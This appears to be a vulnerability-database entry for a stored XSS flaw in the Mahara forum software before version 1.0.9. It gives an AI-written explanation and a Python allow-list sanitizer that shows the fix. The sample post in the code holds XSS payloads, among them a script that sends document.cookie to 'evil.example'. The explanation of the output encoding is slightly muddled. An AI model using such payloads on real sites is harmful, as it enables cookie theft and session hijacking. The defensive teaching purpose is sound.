VYPR
Unrated severity · NVD Advisory · Published Feb 9, 2009 · Updated Apr 23, 2026

CVE-2009-0487

Description

Cross-site scripting (XSS) vulnerability in Mahara before 1.0.9 allows remote attackers to inject arbitrary web script or HTML via a crafted forum post.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Mahara before 1.0.9 fails to sanitize HTML in forum posts, allowing stored XSS.

Vulnerability

Mahara versions prior to 1.0.9 contain a stored cross-site scripting (XSS) vulnerability in forum posts. The application does not filter HTML or script content submitted in a forum post body before rendering it to other users, so arbitrary web script or HTML can be injected. The vulnerability affects every deployment that exposes the forum feature and has not upgraded to version 1.0.9 [2].

Exploitation

A remote attacker exploits this by posting a crafted forum message containing malicious HTML or JavaScript. No special privileges are required beyond the ability to post: any user who can create or reply to a forum topic can inject the payload [1]. Because the payload is stored with the post, the script runs each time another user (including an administrator) views the affected post.

Impact

Successful exploitation leads to arbitrary script execution in the context of the victim's browser. This can result in information disclosure (e.g., session cookies, page content), session hijacking, or defacement of the site for other users. The impact is limited to what the victim's session can do and does not directly compromise the server [2]; since the script runs with the victim's privileges, a post viewed by an administrator exposes whatever actions the administrative interface permits in that session.

Mitigation

Upgrade to Mahara version 1.0.9 (released January 28, 2009), which applies HTMLPurifier to filter all forum posts before rendering [2]. Because the filtering happens at render time, posts stored before the upgrade are covered as well. No other workaround is documented in the available references. The vulnerable versions are all releases before 1.0.9.
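The unfiltered and filtered rendering paths side by side, as an added example that is not Mahara's code: Mahara is PHP and 1.0.9 fixed this with HTMLPurifier, whereas this Python stand-in implements the same defence shape (keep a small set of safe tags and attributes, drop everything else, including `<script>` bodies, event-handler attributes and `javascript:` URLs) so the before/after can be run offline. The sample post, the allow-list and the function names are constructed for the illustration and are not taken from the references.

```python
"""Stored XSS in forum posts: unfiltered rendering beside an allow-list filter.

Added illustration for CVE-2009-0487, not Mahara's code. Mahara is PHP and
1.0.9 fixed this with HTMLPurifier; this Python stand-in applies the same
defence shape so the before/after can be run offline. Post content, the
allow-list and all names below are constructed for the example.
"""
from html import escape
from html.parser import HTMLParser

# Constructed sample post: legitimate markup mixed with three stored-XSS
# vectors (inline script, event handler attribute, javascript: URL).
CRAFTED_POST = {
    "subject": "Re: Study group",
    "body": (
        "<b>Meeting moved</b> to room 12."
        "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
        '<img src="x" onerror="alert(document.cookie)">'
        '<a href="javascript:alert(1)">details</a>'
        '<a href="https://example.org/room12">map</a>'
    ),
}

ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "a", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}}          # no on*, style, src, ... on any tag
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style"}  # markup and enclosed text both discarded


class AllowListSanitizer(HTMLParser):
    """Re-serialises HTML keeping only allow-listed tags and attributes; text is re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._open = []        # allow-listed tags currently open, for balanced output
        self._skip_depth = 0   # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        # HTMLParser has already lower-cased the tag and attribute names.
        if self._skip_depth:
            if tag in DROP_WITH_CONTENT:
                self._skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self._skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return                        # unknown tag: markup dropped, its text kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue                  # this is what removes onerror=, onclick=, style=
            if name == "href" and not (value or "").strip().lower().startswith(SAFE_URL_SCHEMES):
                continue                  # blocks javascript:, data:, vbscript: links
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_endtag(self, tag):
        if self._skip_depth:
            if tag in DROP_WITH_CONTENT:
                self._skip_depth -= 1
            return
        if tag in self._open:             # close back to the matching tag
            while self._open:
                t = self._open.pop()
                self.out.append(f"</{t}>")
                if t == tag:
                    break

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(escape(data, quote=False))

    def result(self):
        self.close()                      # flush text the parser is still buffering
        while self._open:                 # close anything the author left open
            self.out.append(f"</{self._open.pop()}>")
        return "".join(self.out)


def sanitize(html):
    s = AllowListSanitizer()
    s.feed(html)
    return s.result()


def render_vulnerable(post):
    """Pre-1.0.9 behaviour as the advisory describes it: body inserted verbatim."""
    return f"<div class='post'><h3>{escape(post['subject'])}</h3>{post['body']}</div>"


def render_hardened(post):
    """1.0.9-style behaviour: body passes through the allow-list filter at render time."""
    return f"<div class='post'><h3>{escape(post['subject'])}</h3>{sanitize(post['body'])}</div>"


def contains_active_content(html):
    """Cheap marker check used only to show the difference; not a substitute for the filter."""
    h = html.lower()
    return "<script" in h or "onerror=" in h or "javascript:" in h


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(CRAFTED_POST))
    print("hardened:  ", render_hardened(CRAFTED_POST))
```

The filter keeps `<b>` and the `https:` link, drops the `<script>` element together with its body, strips the `onerror` attribute by discarding the `<img>` tag, and removes the `javascript:` href while keeping the link text. Note that the hardened path re-escapes text on output, so a body like `Tom &amp; Jerry` comes back as `Tom &amp; Jerry` rather than a bare `&`; this is the same render-time placement the advisory credits to 1.0.9, which is why posts stored before the fix are covered too.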

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

13
  • cpe:2.3:a:mahara:mahara:*:*:*:*:*:*:*:* range: <=1.0.8
  • cpe:2.3:a:mahara:mahara:0.9.0:*:*:*:*:*:*:*
  • cpe:2.3:a:mahara:mahara:0.9.1:*:*:*:*:*:*:*
  • cpe:2.3:a:mahara:mahara:0.9.2:*:*:*:*:*:*:*
  • cpe:2.3:a:mahara:mahara:1.0.0:*:*:*:*:*:*:*
  • cpe:2.3:a:mahara:mahara:1.0.1:*:*:*:*:*:*:*
  • cpe:2.3:a:mahara:mahara:1.0.2:*:*:*:*:*:*:*
  • cpe:2.3:a:mahara:mahara:1.0.3:*:*:*:*:*:*:*
  • cpe:2.3:a:mahara:mahara:1.0.4:*:*:*:*:*:*:*
  • cpe:2.3:a:mahara:mahara:1.0.5:*:*:*:*:*:*:*
  • cpe:2.3:a:mahara:mahara:1.0.6:*:*:*:*:*:*:*
  • cpe:2.3:a:mahara:mahara:1.0.7:*:*:*:*:*:*:*
  • (no CPE) range: <1.0.9

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

4

News mentions

0

No linked articles in our index yet.